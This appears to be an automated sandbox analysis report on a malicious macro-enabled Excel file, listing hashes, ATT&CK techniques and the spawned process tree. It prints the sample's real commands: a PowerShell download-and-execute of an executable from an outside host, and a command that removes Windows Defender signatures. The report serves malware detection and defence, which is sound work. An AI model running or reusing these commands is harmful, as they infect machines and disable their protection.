ffc9eca5a1e84b5ebe2d3f7124efbd48d96d24686b429f09743359370f915760

General

Target

e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm
Size

19KB
MD5

e1add0c2917aaf34236db315da09d8f2
SHA1

3460271d345cc4ba4ab112c5abe04e40e483145e
SHA256

ffc9eca5a1e84b5ebe2d3f7124efbd48d96d24686b429f09743359370f915760
SHA512

e041cf1b0c4aeb491488b027d08ea5c2febd640ce08166f5610e9baf783b2eacf39bd23591c3325255e67d548acca49ba72aeff9f0afcaa0505331f8ce252ecc
SSDEEP

384:+2QdQ5yunO0qEF6C4zfusWGCVXToqIJPXaxq5:+U5D6EFTcKdKMc

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://panelonetwothree.ga/work/6.exe

Signatures

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	3048	2572	powershell.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2140	2572	cmd.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	344	2572	powershell.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2816	2572	cmd.exe	30

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3048	powershell.exe
3048	powershell.exe
344	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
2968	taskkill.exe
2728	taskkill.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2572	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3048	powershell.exe
344	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	taskkill.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	2728	taskkill.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2572	EXCEL.EXE
2572	EXCEL.EXE
2572	EXCEL.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2572 wrote to memory of 3048	2572	EXCEL.EXE	31
PID 2572 wrote to memory of 3048	2572	EXCEL.EXE	31
PID 2572 wrote to memory of 3048	2572	EXCEL.EXE	31
PID 2572 wrote to memory of 3048	2572	EXCEL.EXE	31
PID 2572 wrote to memory of 2140	2572	EXCEL.EXE	33
PID 2572 wrote to memory of 2140	2572	EXCEL.EXE	33
PID 2572 wrote to memory of 2140	2572	EXCEL.EXE	33
PID 2572 wrote to memory of 2140	2572	EXCEL.EXE	33
PID 2572 wrote to memory of 344	2572	EXCEL.EXE	35
PID 2572 wrote to memory of 344	2572	EXCEL.EXE	35
PID 2572 wrote to memory of 344	2572	EXCEL.EXE	35
PID 2572 wrote to memory of 344	2572	EXCEL.EXE	35
PID 2572 wrote to memory of 2816	2572	EXCEL.EXE	37
PID 2572 wrote to memory of 2816	2572	EXCEL.EXE	37
PID 2572 wrote to memory of 2816	2572	EXCEL.EXE	37
PID 2572 wrote to memory of 2816	2572	EXCEL.EXE	37
PID 2140 wrote to memory of 2968	2140	cmd.exe	39
PID 2140 wrote to memory of 2968	2140	cmd.exe	39
PID 2140 wrote to memory of 2968	2140	cmd.exe	39
PID 2140 wrote to memory of 2968	2140	cmd.exe	39
PID 344 wrote to memory of 2728	344	powershell.exe	41
PID 344 wrote to memory of 2728	344	powershell.exe	41
PID 344 wrote to memory of 2728	344	powershell.exe	41
PID 344 wrote to memory of 2728	344	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e1add0c2917aaf34236db315da09d8f2_JaffaCakes118.xlsm
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://panelonetwothree.ga/work/6.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winword.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:344
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\system32\taskkill.exe" /f /im Excel.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7a7b68f48c4ac6063d7a81098672f812

SHA1
ca4f9cc0420461cdca612b37f7ecb4473aef059e

SHA256
9bab411e7c97ddbe4d699fc8b35e953c2c5fcfbf9d419e9653907e83a86052ee

SHA512
5c085d0fdcc45aafb5f7fa1eade2bd76f5915fd8dd864ff8c6e317cdfc746daeeddcce8db28418810756c0b13211b4496ca75d86f21bdf4888fa0ffea309e536

Download Submit
memory/2572-1-0x000000007294D000-0x0000000072958000-memory.dmp

Filesize
44KB

Download
memory/2572-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2572-8-0x00000000061C0000-0x00000000062C0000-memory.dmp

Filesize
1024KB

Download
memory/2572-10-0x00000000061C0000-0x00000000062C0000-memory.dmp

Filesize
1024KB

Download
memory/2572-9-0x00000000061C0000-0x00000000062C0000-memory.dmp

Filesize
1024KB

Download
memory/2572-18-0x000000007294D000-0x0000000072958000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing